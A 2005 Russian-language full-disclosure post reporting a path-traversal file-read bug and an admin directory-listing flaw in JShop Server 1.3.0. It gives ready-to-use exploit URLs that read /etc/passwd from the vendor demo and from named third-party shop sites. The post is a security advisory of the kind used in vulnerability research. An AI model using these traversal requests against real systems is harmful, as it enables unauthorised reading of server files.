Related information

Web applications security vulnerabilities (PHP, ASP, CGI, Perl, etc)

[UNIX] MAXdev MD-Pro Multiple Vulnerabilities (Code Execution, Path Disclosure and CSS)

[Full-disclosure] Serendipity: Account Hijacking / CSRF Vulnerability

[Full-disclosure] SquirrelMail Address Add Plugin XSS

PHP-Fusion v6.00.109 SQL Injection / admin|users credentials disclosure

From:	durito <durito_(at)_mail.ru>
Date:	30.09.2005
Subject:	просмотр файлов в JShop Server 1.3.0

Здравствуйте, 3APA3A.

вот нашел новый баг:

 Software:   JShop Server 1.3.0
 Vendor:  JShop E-Commerce http://www.jshop.co.uk/
 Vulnerability: возможность чтения файлов
 Risk:  низкий
 Date:  30.09.2005
 discovered by durito -durito[at]mail[dot]ru-
 HTTP:         www.lwb57.org
               www.carder-world.ru
 IRC:          irc.lwb57.org:6667  #lwb

 +~~~:| Details |:

 Скрипт page.php в параметре xPage не выполняет проверку, что
 приводит к возможности чтения произвольных файлов

 +~~~:| Exploit |:

 http://www.xxx.com/page.php?xPage=../../../../../etc/passwd

 +~~~:| Пример |:

 http://www.jshopecommerce.com/jssdemo/page.php?xPage=../../../../../etc/passwd
 http://www.arianepoole.com/page.php?xPage=../../../../../../etc/passwd
 http://www.jeannearthes.com/page.php?xPage=../../../../../../etc/passwd

 и еще одна проблема, авторизованный администратор может
 просматривать директории других пользователей манипулируя запросами
 в параметре xStartDir:

http://www.jshopecommerce.com/jssdemo/admin/templates_navigate.php?xStartDir=/hom
e/girldati/public_html/&xUsername=demo&xRandID=548383890
http://www.jshopecommerce.com/jssdemo/admin/templates_navigate.php?xStartDir=/hom
e/priority/public_html/&xUsername=demo&xRandID=548383890
--
С уважением,
durito  [LwB Security Team]                mailto:durito@mail.ru
http://lwb57.org
http://durito.narod.ru